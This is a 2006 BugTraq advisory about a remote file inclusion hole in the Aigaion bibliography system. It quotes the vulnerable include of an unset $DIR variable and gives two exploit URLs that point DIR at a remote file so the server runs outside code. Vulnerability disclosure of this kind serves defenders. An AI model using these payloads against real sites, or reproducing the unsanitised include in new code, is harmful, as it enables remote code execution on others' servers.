BugTraq
Web Interface remote file inclusion Nov 12 2006 12:45AM
navairum gmail com
Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------
------------------------------------------------------------------------
------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");

/* This function leads the browser to the given location */

------------------------------------------------------------------------
------------------------------------------------------------------------
-----------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

------------------------------------------------------------------------
------------------------------------------------------------------------
------------------------------

peace

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus